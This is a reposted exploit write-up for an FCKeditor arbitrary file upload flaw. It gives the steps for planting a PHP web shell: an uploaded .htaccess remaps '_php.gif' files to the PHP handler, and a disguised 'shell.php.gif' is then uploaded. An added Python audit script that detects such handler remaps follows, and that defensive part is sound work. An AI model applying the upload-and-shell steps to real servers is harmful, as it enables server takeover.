FCKeditor Upload Vulnerability in All PHP Versions

Posted on 2013-10-27 17:25:21
Author: Anonymous  Source: compiled by this site  Published: 2011-10-25 7:39:07
[+] Title: FCKeditor all versions Arbitrary File Upload Vulnerability
[+] Date: 2011
[+] Author : sinesafe.cn
[+] Website : WwW.sinesafe.cn
———————————————————
1. Create a htaccess file:
code:
<FilesMatch "_php.gif">
SetHandler application/x-httpd-php
</FilesMatch>

2. Now upload this htaccess with FCKeditor.

http://www.sinesafe.cn/FCKeditor ... er/upload/test.html

http://www.sinesafe.cn/FCKeditor ... onnectors/test.html

———————————————————————————————-
3. Now upload shell.php.gif with FCKeditor.
4. After uploading shell.php.gif, the name "shell.php.gif" changes to "shell_php.gif" automatically.
5. http://www.sinesafe.cn/anything/shell_php.gif
6. Now shell is available from server.

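For defenders, the technique above depends on an uploaded .htaccess file that reassigns the PHP handler to an image-looking name. The following is an added example, not part of the original post: a Python audit that walks an upload directory and reports every .htaccess that maps files to a script handler. The function names and the sample directory tree are assumptions constructed for illustration.

```python
import os
import re
import tempfile

# Directives that can (re)assign a content handler or MIME type from .htaccess.
HANDLER_RE = re.compile(r'^\s*(SetHandler|AddHandler|AddType|ForceType)\s+(.+)$', re.I)
SECTION_RE = re.compile(r'^\s*<(FilesMatch|Files)\s+(.+?)\s*>', re.I)
SCRIPT_RE = re.compile(r'php|cgi-script', re.I)  # x-httpd-php, php5-script, ...

def audit_htaccess(text):
    """Return [(directive, argument, enclosing_pattern)] for risky lines."""
    findings, scope = [], None
    for line in text.splitlines():
        if line.lstrip().startswith('#'):
            continue
        sec = SECTION_RE.match(line)
        if sec:
            # Strip straight and typographic quotes around the pattern.
            scope = sec.group(2).strip('"\'\u201c\u201d')
            continue
        if re.match(r'^\s*</Files', line, re.I):
            scope = None
            continue
        m = HANDLER_RE.match(line)
        if m and SCRIPT_RE.search(m.group(2)):
            findings.append((m.group(1), m.group(2).strip(), scope))
    return findings

def scan_upload_root(root):
    """Walk an upload directory; report each .htaccess that remaps handlers."""
    report = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if name.lower() == '.htaccess':
                path = os.path.join(dirpath, name)
                with open(path, encoding='utf-8', errors='replace') as fh:
                    hits = audit_htaccess(fh.read())
                if hits:
                    report[os.path.relpath(path, root)] = hits
    return report

def demo():
    # Constructed sample: a temporary upload tree holding the page's .htaccess.
    sample = '<FilesMatch "_php.gif">\nSetHandler application/x-httpd-php\n</FilesMatch>\n'
    with tempfile.TemporaryDirectory() as root:
        os.makedirs(os.path.join(root, 'image'))
        with open(os.path.join(root, 'image', '.htaccess'), 'w') as fh:
            fh.write(sample)
        return scan_upload_root(root)
```

Any .htaccess inside a user-writable upload directory deserves review even when this scan reports nothing. Setting AllowOverride None for that directory in the main Apache configuration makes the server ignore such files entirely.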